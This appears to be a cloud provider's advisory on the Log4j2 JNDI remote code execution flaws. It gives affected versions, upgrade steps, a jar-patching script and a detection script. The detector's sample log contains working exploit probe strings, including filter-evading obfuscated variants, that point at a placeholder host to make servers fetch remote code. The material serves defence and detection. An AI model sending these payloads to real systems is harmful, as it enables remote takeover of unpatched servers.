Service Notices


Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228 and CVE-2021-45046)

Dec 10, 2021 GMT+08:00

I. Overview

Apache Log4j2 has a remote code execution vulnerability (CVE-2021-44228). When Log4j2 formats a log message, it evaluates lookup expressions such as ${jndi:ldap://host/path} that appear in the message text. An attacker who can get such a string into any logged field (an HTTP header such as User-Agent, a username, a search query) can therefore make the application fetch and execute attacker-supplied code through JNDI. A proof of concept has been publicly disclosed and the risk is high.

In mid-December 2021, the Apache Log4j2 team disclosed a second vulnerability, CVE-2021-45046, affecting versions earlier than 2.16.0: the fix in 2.15.0 was incomplete in certain non-default configurations (for example, when a Pattern Layout uses a Context Lookup such as ${ctx:loginId} and an attacker controls the Thread Context data). It was initially rated as a denial of service and later found to allow remote code execution as well.

Apache Log4j2 is a widely used Java-based logging utility. If you are an Apache Log4j2 user, check your system and implement timely security hardening.

Reference: Apache Log4j Security Vulnerabilities (https://logging.apache.org/log4j/2.x/security.html)

II. Severity

Severity: important

(Severity levels: low, moderate, important, and critical)

III. Affected Products

Affected versions:

2.0-beta9 <= Apache Log4j 2.x < 2.16.0 (Version 2.12.2 is not affected.)

Upgrade affected applications and components, such as spring-boot-starter-log4j2, Apache Solr, Apache Flink, and Apache Druid.

Secure versions:

Apache Log4j 1.x is not affected.

Apache Log4j 2.16.0

IV. Vulnerability Handling

This vulnerability has been fixed in the official version. Upgrade all applications related to Apache Log4j2 to a secure version as soon as possible. Link: https://logging.apache.org/log4j/2.x/download.html

Java 8 (or later) users should upgrade to release 2.16.0.

Java 7 users should upgrade to release 2.12.2.

If the upgrade cannot be performed in a timely manner, remove the JndiLookup class from every log4j-core jar on the classpath and then restart the service:

    zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

Run the command once per jar: zip -d takes a single archive as its first argument, so if the glob expands to more than one jar the extra names are treated as entries to delete rather than archives to patch. Also look for copies of log4j-core bundled inside application archives (for example under WEB-INF/lib in a .war, or inside a fat jar), which the glob does not reach, and verify afterwards with unzip -l <jar> | grep JndiLookup that the class is gone. Setting log4j2.formatMsgNoLookups=true (or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable) is not a sufficient mitigation, because CVE-2021-45046 bypasses it.

Note: Before fixing vulnerabilities, back up your files and conduct a thorough test.
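The upgrade-or-strip procedure above, as an added example in Python (it is not Huawei Cloud or Apache tooling): it walks a directory tree, finds every log4j-core jar including copies nested inside .war/.ear/fat jars, classifies each one against the affected range in section III, and rewrites an affected jar without JndiLookup.class, which is what the zip -d command does. It assumes the jar manifest carries an Implementation-Version header, as official log4j-core builds do; the sample tree built by demo() is constructed for the demonstration.

```python
# Added example (not Huawei Cloud or Apache tooling): find log4j-core jars, including
# copies nested in .war/.ear/fat jars, classify them against the affected range above,
# and apply the JndiLookup-removal workaround by rewriting the jar without that entry.
# Assumes META-INF/MANIFEST.MF carries Implementation-Version, as the official builds do.
import io, os, re, tempfile, zipfile
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"
CORE_JAR = re.compile(r"(^|/)log4j-core-[^/]*\.jar$")
ARCHIVE = re.compile(r"\.(jar|war|ear|zip)$", re.I)
PRE_RANK = {"alpha": 0, "beta": 1, "rc": 2}  # pre-releases sort below the final build (3)

def parse_version(text):
    """'2.14.1' -> (2, 14, 1, 3, 0); '2.0-beta9' -> (2, 0, 0, 1, 9); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z]+)(\d*))?", text or "")
    if not m:
        return None
    pre = (PRE_RANK.get(m.group(4).lower(), 0), int(m.group(5) or 0)) if m.group(4) else (3, 0)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)) + pre

def is_affected(version):
    """2.0-beta9 <= v < 2.16.0, except 2.12.2 (the Java 7 fix release); None if unknown."""
    v = parse_version(version)
    if v is None:
        return None
    if v[:3] == (2, 12, 2):
        return False
    return parse_version("2.0-beta9") <= v < parse_version("2.16.0")

def inspect_jar(data):
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names, version = set(zf.namelist()), None
        if MANIFEST in names:
            for line in zf.read(MANIFEST).decode("utf-8", "replace").splitlines():
                if line.startswith("Implementation-Version:"):
                    version = line.split(":", 1)[1].strip()
    return {"version": version, "has_jndi_lookup": JNDI_CLASS in names}

def assess(data):
    info = inspect_jar(data)
    affected = is_affected(info["version"])
    if affected is False:
        return "not affected"
    if not info["has_jndi_lookup"]:
        return "mitigated"  # class already removed, lookups cannot reach JNDI
    return "affected" if affected else "unknown version, JndiLookup present"

def strip_jndi_lookup(data):
    """Same effect as `zip -q -d <jar> org/.../JndiLookup.class`: copy of the jar minus that entry."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_CLASS:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()

def iter_log4j_cores(data, path):
    """Yield (virtual_path, jar_bytes) for each log4j-core jar, descending into nested archives."""
    if CORE_JAR.search(path):
        yield path, data
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for name in zf.namelist():
                if ARCHIVE.search(name):
                    yield from iter_log4j_cores(zf.read(name), path + "!/" + name)

def scan_dir(root):
    """[(path relative to root, status)] for every log4j-core jar found under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if ARCHIVE.search(fn):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    data = fh.read()
                findings += [(p, assess(j)) for p, j in iter_log4j_cores(data, os.path.relpath(full, root))]
    return findings

def build_sample_jar(version, with_jndi=True):  # constructed stand-in for log4j-core-<version>.jar
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(MANIFEST, "Manifest-Version: 1.0\r\nImplementation-Version: %s\r\n" % version)
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()

def demo():
    """Constructed tree: a loose affected jar plus a .war shipping 2.12.2 under WEB-INF/lib."""
    root = tempfile.mkdtemp()
    loose = os.path.join(root, "lib", "log4j-core-2.14.1.jar")
    os.makedirs(os.path.dirname(loose))
    jar = build_sample_jar("2.14.1")
    with open(loose, "wb") as fh:
        fh.write(jar)
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.12.2.jar", build_sample_jar("2.12.2"))
    before = dict(scan_dir(root))
    with open(loose, "wb") as fh:          # apply the workaround to the affected jar only
        fh.write(strip_jndi_lookup(jar))
    return before, dict(scan_dir(root))
```

Calling demo() returns the scan results before and after the workaround: the loose 2.14.1 jar goes from "affected" to "mitigated", while the 2.12.2 jar inside app.war is reported "not affected" both times. On a real host, point scan_dir() at the application root, strip only jars reported as "affected", and treat a jar with no manifest version as needing manual inspection rather than as safe.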

The following HUAWEI CLOUD security services keep scanning for this vulnerability and its variant attacks. You can enable protection in the following services:

1. Web Application Firewall (WAF) can defend against attacks exploiting this vulnerability. Set the Mode to Block in the Basic Web Protection configuration area. For details, see Configuring Basic Web Protection Rules.

2. HUAWEI CLOUD Host Security Service (HSS) can scan applications for the vulnerability. Log in to the HSS console, choose Web Tamper Protection > Server Protection, and enable dynamic Web Tamper Protection for your servers. For details, see Enabling Web Tamper Protection.

3. HUAWEI CLOUD Container Guard Service (CGS) can scan private images for the vulnerability. The basic edition is free of charge. Log in to the CGS console, choose Image Security, click the Image Vulnerabilities tab, and click the Private Image Vulnerabilities tab. For details, see Managing Private Image Vulnerabilities.
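Blocking on the literal string ${jndi: is not enough for the "variant attacks" mentioned above: Log4j resolves nested lookups before the JNDI lookup runs, so probes such as ${${lower:j}ndi:...} or ${${::-j}ndi:...} reach the vulnerable code while evading a naive match. The following added example (Python; it is not Huawei Cloud WAF's rule set or any Apache code) shows the kind of normalization a WAF or log monitor needs: it URL-decodes each request-log line, collapses lookups inside-out as Log4j's substitutor would, and reports the resolved jndi: payload. The access-log lines are constructed, using the 203.0.113.0/24 and 198.51.100.0/24 documentation ranges.

```python
# Added example (not Huawei Cloud WAF or Apache code): resolve nested Log4j lookups in
# request-log lines so that obfuscated ${jndi:...} probes are caught, not just the literal.
import re
from urllib.parse import unquote

# Innermost ${...} expression: a body with no further $, { or } in it.
INNER = re.compile(r"\$\{([^${}]*)\}")

def resolve_lookups(text, max_steps=200):
    """Collapse nested lookups inside-out, as Log4j's StrSubstitutor does, until a
    jndi: lookup surfaces or nothing is left. Returns (found, payload_or_normalized_text)."""
    for _ in range(max_steps):
        m = INNER.search(text)
        if m is None:
            return False, text
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            return True, m.group(0)           # fully resolved jndi lookup
        if ":-" in body:                      # ${x:-default} -> default (x may be empty)
            repl = body.split(":-", 1)[1]
        elif body.lower().startswith("lower:"):
            repl = body[6:].lower()
        elif body.lower().startswith("upper:"):
            repl = body[6:].upper()
        else:                                 # env:, sys:, ctx:, date: ... with no default:
            repl = ""                         # value unknown to us, treat as empty
        text = text[:m.start()] + repl + text[m.end():]
    return False, text

def scan_line(line, decode_rounds=3):
    """URL-decode repeatedly (double encoding is common) and then resolve lookups.
    Returns the resolved jndi payload, or None for a benign line."""
    decoded = line
    for _ in range(decode_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    found, payload = resolve_lookups(decoded)
    return payload if found else None

def scan_lines(lines):
    """Return [(line_number, payload)] for every line carrying a jndi lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        payload = scan_line(line)
        if payload:
            hits.append((n, payload))
    return hits

# Constructed access-log lines: four probes (plain, lower-lookup, default-value and
# URL-encoded obfuscation) followed by two benign requests.
SAMPLE_LOG = [
    '203.0.113.10 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.10 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.10/x}"',
    '203.0.113.10 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10/y}"',
    '203.0.113.10 - - "GET /?q=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Aldap%3A%2F%2F203.0.113.10%2Fz%7D HTTP/1.1" 200 "-" "curl/7.79"',
    '198.51.100.7 - - "GET /search?q=${price} HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '198.51.100.7 - - "GET /docs HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, payload in scan_lines(SAMPLE_LOG):
        print("line %d: %s" % (n, payload))
```

Only the lower:, upper: and default-value (:-) forms are resolved here, since those are the ones an attacker can predict the output of; other lookups (env:, sys:, ctx:, date:) without a default collapse to an empty string, so a payload that depends on, say, a date: pattern containing quoted literals is a known gap and should be handled by a separate rule. The check is deliberately applied to the decoded request as a whole rather than to one header, because any logged field can carry the probe.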